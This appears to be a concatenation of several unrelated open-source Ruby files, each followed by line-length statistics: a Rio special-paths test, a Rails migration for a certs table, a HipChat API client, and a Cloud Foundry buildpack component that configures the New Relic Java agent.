assert_equal(rinfo[k][1],r.opaque)
assert_equal(rinfo[k][2],r.path)
assert_equal(rinfo[k][3],r.fspath)
assert_equal(rinfo[k][4],r.to_s)
assert_equal(rinfo[k][5],r.to_url)
end
end
def test_specialpaths
rios,rinfo = mkrios1()
check_rios(rios,rinfo)
end
def test_specialpaths_sym
rios,rinfo = mkrios_sym()
check_rios(rios,rinfo)
end
def test_specialpaths_modfunc
rios,rinfo = mkrios_modfunc()
check_rios(rios,rinfo)
end
def test_specialpaths_classmeth
rios,rinfo = mkrios_classmeth()
check_rios(rios,rinfo)
end
def mkrios_open()
require 'tempfile'
stdlib_temppath = ::Tempfile.new('rio').path
fnre = "#{@tmppath}(\\.)?\\d+.\\d+"
rinfo = {
?- => ['stdout',/^$/,nil,nil,/^stdout:$/,/^stdout:$/],
?? => ['file',%r|//#{fnre}|,%r|#{fnre}|,%r|#{fnre}|,/#{fnre}/,/#{fnre}/],
}
siopq = sprintf("0x%08x",$stdout.object_id)
rios = {
?- => rio(?-).print("."),
?? => rio(??).puts("hw"),
}
[rios,rinfo]
end
def test_specialpaths_open
fmt = "%-12s %-12s %-8s %-8s %-20s %-20s\n"
#printf(fmt,'scheme','opaque','path','fspath','to_s','url')
rios,rinfo = mkrios_open()
rios.each do |k,r|
#pinfo(fmt,pathinfo(r))
assert_equal(rinfo[k][0],r.scheme)
assert_match(rinfo[k][1],r.opaque)
assert_match(rinfo[k][4],r.to_s)
assert_match(rinfo[k][5],r.to_url)
end
assert_match(rinfo[??][2],rios[??].path)
assert_match(rinfo[??][3],rios[??].fspath)
end
end
| 26.016484 | 79 | 0.549102 |
1120581a74718321e844568c2d3381b548bff862 | 157 | class CreateCerts < ActiveRecord::Migration
def change
create_table :certs do |t|
t.string :cert_name
t.string :exp_date
end
end
end
| 17.444444 | 43 | 0.675159 |
e8f22852015f4222e679c4bec0f3cae67b71e2d5 | 3,598 | module HipChat
class Client
include HTTParty
format :json
def initialize(token, options={})
@token = token
default_options = { api_version: 'v1', server_url: 'https://api.hipchat.com' }
@options = default_options.merge options
@api_version = options[:api_version]
@api = HipChat::ApiVersion::Client.new(@options)
self.class.base_uri(@api.base_uri)
http_proxy = options[:http_proxy] || ENV['http_proxy']
setup_proxy(http_proxy) if http_proxy
end
def rooms
@rooms ||= _rooms
end
def [](name)
HipChat::Room.new(@token, { room_id: name, :api_version => @api_version, :server_url => @options[:server_url] })
end
def create_room(name, options={})
if @api.version == 'v1' && options[:owner_user_id].nil?
raise RoomMissingOwnerUserId, 'V1 API Requires owner_user_id'
end
if name.length > 50
raise RoomNameTooLong, "Room name #{name} is #{name.length} characters long. Limit is 50."
end
unless options[:guest_access].nil?
options[:guest_access] = @api.bool_val(options[:guest_access])
end
response = self.class.post(@api.create_room_config[:url],
:query => { :auth_token => @token },
:body => {
:name => name
}.merge(options).send(@api.create_room_config[:body_format]),
:headers => @api.headers
)
case response.code
when 201, 200 #CREATED
response.parsed_response
when 400
raise UnknownRoom, "Error: #{response.message}"
when 401
raise Unauthorized, 'Access denied'
else
raise UnknownResponseCode, "Unexpected error #{response.code}"
end
end
def user(name)
HipChat::User.new(@token, { :user_id => name, :api_version => @api_version, :server_url => @options[:server_url] })
end
def users
@users ||= _users
end
private
def no_proxy?
host = URI.parse(@options[:server_url]).host
ENV.fetch('no_proxy','').split(',').any? do |pattern|
# convert patterns like `*.example.com` into `.*\.example\.com`
host =~ Regexp.new(pattern.gsub(/\./,'\\.').gsub(/\*/,'.*'))
end
end
def setup_proxy(proxy_url)
return if no_proxy?
proxy_url = URI.parse(proxy_url)
self.class.http_proxy(proxy_url.host, proxy_url.port,
proxy_url.user, proxy_url.password)
HipChat::Room.http_proxy(proxy_url.host, proxy_url.port,
proxy_url.user, proxy_url.password)
end
def _rooms
response = self.class.get(@api.rooms_config[:url],
:query => {
:auth_token => @token
},
:headers => @api.headers
)
case response.code
when 200
response[@api.rooms_config[:data_key]].map do |r|
HipChat::Room.new(@token, r.merge(:api_version => @api_version, :server_url => @options[:server_url]))
end
else
raise UnknownResponseCode, "Unexpected #{response.code} for room"
end
end
def _users
response = self.class.get(@api.users_config[:url],
:query => {
:auth_token => @token,
:expand => 'items'
},
:headers => @api.headers
)
case response.code
when 200
response[@api.users_config[:data_key]].map do |u|
HipChat::User.new(@token, u.merge(:api_version => @api_version))
end
else
raise UnknownResponseCode, "Unexpected #{response.code} for user"
end
end
end
end
| 29.016129 | 121 | 0.59144 |
1a4039ce50e4fc766673e609e5c22c1dde659ce9 | 2,795 | # Encoding: utf-8
# Cloud Foundry Java Buildpack
# Copyright 2013-2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'java_buildpack/component/versioned_dependency_component'
require 'java_buildpack/framework'
module JavaBuildpack
module Framework
# Encapsulates the functionality for enabling zero-touch New Relic support.
class NewRelicAgent < JavaBuildpack::Component::VersionedDependencyComponent
# (see JavaBuildpack::Component::BaseComponent#compile)
def compile
download_jar
@droplet.copy_resources
end
# (see JavaBuildpack::Component::BaseComponent#release)
def release
credentials = @application.services.find_service(FILTER)['credentials']
java_opts = @droplet.java_opts
configuration = {}
apply_configuration(credentials, configuration)
apply_user_configuration(credentials, configuration)
write_java_opts(java_opts, configuration)
java_opts.add_javaagent(@droplet.sandbox + jar_name)
.add_system_property('newrelic.home', @droplet.sandbox)
java_opts.add_system_property('newrelic.enable.java.8', 'true') if @droplet.java_home.java_8_or_later?
end
protected
# (see JavaBuildpack::Component::VersionedDependencyComponent#supports?)
def supports?
@application.services.one_service? FILTER, [LICENSE_KEY, LICENSE_KEY_USER]
end
private
FILTER = /newrelic/
LICENSE_KEY = 'licenseKey'.freeze
LICENSE_KEY_USER = 'license_key'.freeze
private_constant :FILTER, :LICENSE_KEY, :LICENSE_KEY_USER
def apply_configuration(credentials, configuration)
configuration['log_file_name'] = 'STDOUT'
configuration[LICENSE_KEY_USER] = credentials[LICENSE_KEY]
configuration['app_name'] = @application.details['application_name']
end
def apply_user_configuration(credentials, configuration)
credentials.each do |key, value|
configuration[key] = value
end
end
def write_java_opts(java_opts, configuration)
configuration.each do |key, value|
java_opts.add_system_property("newrelic.config.#{key}", value)
end
end
end
end
end
| 32.5 | 110 | 0.71449 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.